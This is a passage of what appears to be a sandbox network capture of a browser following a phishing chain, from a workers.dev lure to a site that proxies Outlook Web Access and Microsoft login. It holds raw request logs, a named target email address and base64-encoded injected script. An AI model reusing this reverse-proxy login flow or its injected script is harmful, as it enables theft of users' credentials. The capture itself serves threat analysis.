38 4b 46 2f 49 71 38 7a 34 77 4e 6a 63 51 4c 52 2f 39 51 55 49 70 47
                                      Data Ascii: hoZkZqiXh4b3ODc4mKhVKZkHZ8e36KgZVymoGCo52EoZqXeXd+iqagrKWFbpafsKWGs4h6tLZ7wYq0on6OuKiaxbSsf7+/idCLvsjVqsDAyajPrKuv09e/rtmb5bTRotHe2767vtjnz+TO6q7j5djC8/C31tDu4PzU+vj52vv9wt4D6gHJAeEK2wrM3u0AAePrBxLn/A8YFfgO3u78BQYLABXoHhcm5yoEIgXnKy8KF/Iq8z4wNjcQLR/9QUIpG
                                      2024-03-22 14:24:08 UTC859INData Raw: 4e 67 31 74 67 66 33 53 44 53 59 64 77 65 47 69 58 61 57 64 73 64 32 32 42 59 6e 31 6a 65 6e 53 6a 69 5a 4e 34 71 71 75 59 66 70 36 75 62 34 4f 76 6a 4c 46 33 70 61 4b 4e 65 37 71 6e 6d 6f 69 76 6b 4b 43 56 6d 36 37 46 6d 4c 57 7a 75 4a 65 43 78 6f 71 47 67 73 76 48 6b 38 47 6c 73 70 2f 56 72 49 7a 63 70 4d 65 78 70 39 76 41 34 36 2f 54 33 37 53 30 73 74 61 68 73 38 62 41 71 4b 32 35 77 65 6a 42 7a 72 33 46 71 65 50 46 78 4d 54 55 7a 4c 61 31 79 65 72 68 30 63 33 64 32 4e 58 33 35 4d 6e 54 77 67 6a 38 78 2b 63 41 32 74 2f 73 39 4e 58 6d 42 41 76 56 30 66 41 63 39 39 2f 31 2b 41 45 6c 2b 66 51 67 35 74 37 39 46 50 77 73 47 50 33 2b 43 4f 67 42 41 6a 41 4e 39 41 49 31 4e 44 44 74 4c 44 73 53 2f 68 72 33 49 78 51 62 50 79 48 35 52 43 55 49 44 44 77 65 51 42
                                      Data Ascii: Ng1tgf3SDSYdweGiXaWdsd22BYn1jenSjiZN4qquYfp6ub4OvjLF3paKNe7qnmoivkKCVm67FmLWzuJeCxoqGgsvHk8Glsp/VrIzcpMexp9vA46/T37S0stahs8bAqK25wejBzr3FqePFxMTUzLa1yerh0c3d2NX35MnTwgj8x+cA2t/s9NXmBAvV0fAc99/1+AEl+fQg5t79FPwsGP3+COgBAjAN9AI1NDDtLDsS/hr3IxQbPyH5RCUIDDweQB
                                      2024-03-22 14:24:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.449771104.17.2.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:08 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:09 UTC386INHTTP/1.1 400 Bad Request
                                      Date: Fri, 22 Mar 2024 14:24:09 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      cf-chl-out: uK26dB7ot5JYRtd5lyoHvQ==$yX7QBqVUxLC9mYHI/4744g==
                                      Server: cloudflare
                                      CF-RAY: 8686d7f87ced0f75-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:24:09 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                      Data Ascii: 7invalid
                                      2024-03-22 14:24:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.449770172.67.132.204433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:08 UTC964OUTPOST /?qrc=jgol@bgclinic.com HTTP/1.1
                                      Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Connection: keep-alive
                                      Content-Length: 603
                                      Cache-Control: max-age=0
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      Origin: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-User: ?1
                                      Sec-Fetch-Dest: document
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.com
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:08 UTC603OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6d 51 74 2d 66 61 6d 4d 73 5a 6d 71 61 50 74 71 65 39 7a 73 75 47 72 57 39 76 56 68 62 52 63 5f 56 69 5f 48 43 31 4b 5f 59 41 75 71 4b 45 30 53 66 72 74 4d 37 71 4c 36 72 48 55 72 42 58 56 58 43 35 34 6d 4d 5a 78 55 35 2d 37 79 62 31 5f 2d 31 6a 76 6a 68 6d 4b 69 44 30 49 67 51 63 41 52 33 74 67 45 67 51 59 49 74 6a 4d 64 52 39 4a 37 52 65 49 42 32 6b 67 37 63 2d 62 41 45 6b 53 6b 71 6a 51 74 4c 6f 61 69 53 57 78 63 4c 45 75 50 56 72 48 49 5f 69 78 53 72 64 64 76 47 53 74 7a 72 68 5f 44 6d 68 66 32 38 34 70 43 2d 62 74 6f 49 64 68 44 79 4d 57 48 41 58 39 6e 65 4d 4e 6c 79 52 71 45 44 46 72 37 4a 6d 61 36 73 74 39 53 56 5a 58 62 75 7a 61 6b 55 4b 79 6e 47 51 67 51 79 38 66 4e 6d 72 54
                                      Data Ascii: cf-turnstile-response=0.mQt-famMsZmqaPtqe9zsuGrW9vVhbRc_Vi_HC1K_YAuqKE0SfrtM7qL6rHUrBXVXC54mMZxU5-7yb1_-1jvjhmKiD0IgQcAR3tgEgQYItjMdR9J7ReIB2kg7c-bAEkSkqjQtLoaiSWxcLEuPVrHI_ixSrddvGStzrh_Dmhf284pC-btoIdhDyMWHAX9neMNlyRqEDFr7Jma6st9SVZXbuzakUKynGQgQy8fNmrT
                                      2024-03-22 14:24:09 UTC581INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:24:09 GMT
                                      Content-Type: text/html;
                                      Content-Length: 1136
                                      Connection: close
                                      status: 200
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWIaZq5K8LIAzo2RJg1EHtsXar6GrtrHxpgEFF4Wd4LlNy74PL4m52sMSgnmpAv7WXktCV1EY3hn2jBFjhaBZbFzWxt2PuE2hzDBDxT%2B8CuLJizoeN%2FE5lE%2BIGousmLfQyqErp9r3Abm89HTzv8rzLbYqwKyeQNKERc7tjd9FUU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8686d7f7beca42ee-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:24:09 UTC788INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 66 69 6c 65 73 79 73 74 65 6d 3a 20 61 62 6f 75 74 3a 20 77 73 3a 20 77 73 73 3a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 69
                                      Data Ascii: <!doctype html><html><head><meta http-equiv="Content-Security-Policy" content="default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-i
                                      2024-03-22 14:24:09 UTC348INData Raw: 6d 46 30 4c 6e 56 7a 49 69 77 69 61 32 56 35 49 6a 6f 69 52 7a 42 73 62 57 38 34 51 30 56 72 59 6d 6b 33 49 69 77 69 63 58 4a 6a 49 6a 6f 69 61 6d 64 76 62 45 42 69 5a 32 4e 73 61 57 35 70 59 79 35 6a 62 32 30 69 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 54 45 78 4d 54 63 30 4e 44 6b 73 49 6d 56 34 63 43 49 36 4d 54 63 78 4d 54 45 78 4e 7a 55 32 4f 58 30 2e 73 2d 5a 54 4b 49 49 4d 69 41 79 57 55 50 55 2d 2d 74 34 71 76 66 6c 59 51 4e 6f 6b 45 39 45 66 6a 36 77 39 57 4d 6f 36 77 68 49 22 20 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68
                                      Data Ascii: mF0LnVzIiwia2V5IjoiRzBsbW84Q0VrYmk3IiwicXJjIjoiamdvbEBiZ2NsaW5pYy5jb20iLCJpYXQiOjE3MTExMTc0NDksImV4cCI6MTcxMTExNzU2OX0.s-ZTKIIMiAyWUPU--t4qvflYQNokE9Efj6w9WMo6whI" allowfullscreen="true" style="position:fixed;top:0;left:0;bottom:0;right:0;width:100%;heigh


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.449772162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:09 UTC967OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMiLCJkb21haW4iOiIyNGthcmF0LnVzIiwia2V5IjoiRzBsbW84Q0VrYmk3IiwicXJjIjoiamdvbEBiZ2NsaW5pYy5jb20iLCJpYXQiOjE3MTExMTc0NDksImV4cCI6MTcxMTExNzU2OX0.s-ZTKIIMiAyWUPU--t4qvflYQNokE9Efj6w9WMo6whI HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:09 UTC306INHTTP/1.1 302 Found
                                      Set-Cookie: qPdM=G0lmo8CEkbi7; path=/; samesite=none; secure; httponly
                                      Set-Cookie: qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; path=/; samesite=none; secure; httponly
                                      location: /?qrc=jgol%40bgclinic.com
                                      Date: Fri, 22 Mar 2024 14:24:09 GMT
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      2024-03-22 14:24:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.449773162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:10 UTC791OUTGET /?qrc=jgol%40bgclinic.com HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4
                                      2024-03-22 14:24:10 UTC1184INHTTP/1.1 302 Moved Temporarily
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      Location: https://24karat.us/owa/?login_hint=jgol%40bgclinic.com
                                      Server: Microsoft-IIS/10.0
                                      request-id: dd2627fd-d96d-8aa4-502f-2aa0ae138e2e
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-FEServer: SA1P222CA0072, SA1P222CA0072
                                      X-RequestId: 4f0f85bf-cdd1-47c1-8649-55084a77eccc
                                      X-FEProxyInfo: SA1P222CA0072.NAMP222.PROD.OUTLOOK.COM
                                      X-FEEFZInfo: SAT
                                      MS-CV: /Scm3W3ZpIpQLyqgrhOOLg.0
                                      X-Powered-By: ASP.NET
                                      Date: Fri, 22 Mar 2024 14:24:10 GMT
                                      Connection: close
                                      Content-Length: 0
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.449774162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:10 UTC802OUTGET /owa/?login_hint=jgol%40bgclinic.com HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4
                                      2024-03-22 14:24:11 UTC7122INHTTP/1.1 302 Found
                                      content-length: 1348
                                      Content-Type: text/html; charset=utf-8
                                      Location: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=
                                      Server: Microsoft-IIS/10.0
                                      request-id: 011b9c11-b41c-b6e8-2e7a-c4e7f196eb40
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Alt-Svc: h3=":443",h3-29=":443"
                                      X-CalculatedFETarget: BY5PR04CU001.internal.outlook.com
                                      X-BackEndHttpStatus: 302, 302
                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                      Set-Cookie: ClientId=AD8DDA6D248F459D832803D0055B823B; expires=Sat, 22-Mar-2025 14:24:11 GMT; path=/;SameSite=None; secure
                                      Set-Cookie: ClientId=AD8DDA6D248F459D832803D0055B823B; expires=Sat, 22-Mar-2025 14:24:11 GMT; path=/;SameSite=None; secure
                                      Set-Cookie: OIDC=1; expires=Sun, 22-Sep-2024 14:24:11 GMT; path=/;SameSite=None; secure; HttpOnly
                                      Set-Cookie: RoutingKeyCookie=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.token.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.id_token.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.code.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.tokenPostPath=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; expires=Fri, 22-Mar-2024 15:24:11 GMT; path=/;SameSite=None; secure; HttpOnly
                                      Set-Cookie: HostSwitchPrg=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OptInPrg=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: ClientId=AD8DDA6D248F459D832803D0055B823B; expires=Sat, 22-Mar-2025 14:24:11 GMT; path=/;SameSite=None; secure
                                      Set-Cookie: OIDC=1; expires=Sun, 22-Sep-2024 14:24:11 GMT; path=/;SameSite=None; secure; HttpOnly
                                      Set-Cookie: RoutingKeyCookie=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.token.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.id_token.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.code.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.tokenPostPath=; domain=24karat.us; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; expires=Fri, 22-Mar-2024 15:24:11 GMT; path=/;SameSite=None; secure; HttpOnly
                                      Set-Cookie: HostSwitchPrg=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: OptInPrg=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 22-Mar-1994 14:24:11 GMT; path=/; secure
                                      Set-Cookie: X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; expires=Fri, 22-Mar-2024 20:26:11 GMT; path=/;SameSite=None; secure; HttpOnly
                                      X-CalculatedBETarget: SJ0P222MB0348.NAMP222.PROD.OUTLOOK.COM
                                      X-RUM-Validated: 1
                                      X-RUM-NotUpdateQueriedPath: 1
                                      X-RUM-NotUpdateQueriedDbCopy: 1
                                      X-BeSku: WCS6
                                      X-OWA-DiagnosticsInfo: 1;0;0
                                      X-IIDs: 0
                                      X-BackEnd-Begin: 2024-03-22T14:24:11.172
                                      X-BackEnd-End: 2024-03-22T14:24:11.172
                                      X-DiagInfo: SJ0P222MB0348
                                      X-BEServer: SJ0P222MB0348
                                      X-UA-Compatible: IE=EmulateIE7
                                      X-Proxy-RoutingCorrectness: 1
                                      X-Proxy-BackendServerStatus: 302
                                      X-FEProxyInfo: SA1P222CA0057.NAMP222.PROD.OUTLOOK.COM
                                      X-FEEFZInfo: SAT
                                      X-FEServer: BY5PR04CA0023, SA1P222CA0057
                                      NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                      X-FirstHopCafeEFZ: SAT
                                      Date: Fri, 22 Mar 2024 14:24:10 GMT
                                      Connection: close
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                      2024-03-22 14:24:11 UTC1348INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65
                                      Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.449775162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
